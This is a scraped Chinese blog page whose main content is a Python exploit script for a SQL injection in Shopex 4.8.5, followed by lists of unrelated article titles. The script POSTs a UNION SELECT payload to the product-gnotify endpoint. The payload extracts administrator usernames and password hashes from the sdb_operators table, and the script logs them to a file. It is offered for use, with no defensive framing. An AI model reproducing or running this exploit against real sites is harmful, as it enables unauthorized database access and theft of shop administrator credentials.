数字雨Shopex 4.8.5 SQL Injection Exp
# -*- coding:utf-8 -*
#Author:MXi4oyu
#Email:798033502@qq.com
#Shopex 4.8.5 SQL Injection Exp
#转载请说明来路,谢谢合作
import httplib2
from urllib import urlencode
import re
import time
outfile=open('result.txt','a+')
def Exp(url):
url=url+'/?product-gnotify'
#定义要提交的数据
html='1 and 1=2 union select 1,2,3,4,5,6,7,8,concat(0x245E,username,0x2D3E,userpass,0x5E24),10,11,12,13,14,15,16,17,18,19,20,21,22 from sdb_operators limit 0,1'
data={"goods[goods_id]":'3',"goods[product_id]":html}
h = httplib2.Http('.cache')
response,content = h.request(url, 'POST', urlencode(data),
headers={'Content-Type': 'application/x-www-form-urlencoded'})
gre=re.compile('\$\^(.+)?\^\$')
s=content
pwd=gre.findall(s)[0]
outfile.write(url+"\n"+pwd+"\n+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n")
if __name__=='__main__':
Exp('http://www.xxx.com/')
最新文章
- CARP
- treeMap and treeSet
- [译]Python编写虚拟解释器
- ajax中向HTML页面中指定位置添加信息
- TweenMax动画库学习(五)
- Java SSL/TLS Socket实现
- hdu 5424 Rikka with Graph II(dfs+哈密顿路径)
- USACO Arithmetic Progressions 【构造等差数列】
- A. Night at the Museum Round#376 (Div. 2)
- MySQL DROP TABLE操作以及 DROP 大表时的注意事项【转】
- NODE中解决跨域请求的问题
- ES5新增数组方法every()、some()、filter()、map()
- 2019.01.10 bzoj1095: [ZJOI2007]Hide 捉迷藏(动态点分治)
- php解析mpp文件中的资源
- UVa 508 Morse Mismatches (模糊暴力)
- Hadoop案例(四)倒排索引(多job串联)与全局计数器
- php 实现Iterator 接口
- Javascript 香港身份证号校验
- C语言 内存分配 地址 指针 数组 参数 实例解析
- JavaWeb Filter
热门文章
- [置顶] think in java interview-高级开发人员面试宝典(八)
- Swift - 禁用UIWebView和WKWebView的下拉拖动效果
- MySQL存储引擎:InnoDB和MyISAM的差别/优劣评价/评测/性能测试
- 事务管理在三层架构中应用以及使用ThreadLocal再次重构
- linux安装Eclipse c++环境
- 某公司ASP.NET应聘上机试题
- asp.net ajax 检测用户名是否可用代码
- 7个基于Linux命令行的文件下载和网站浏览工具
- android程序中使用命令行及获得命令行执行后的内容
- 很好用的一个类:TJvAppXMLFileStorage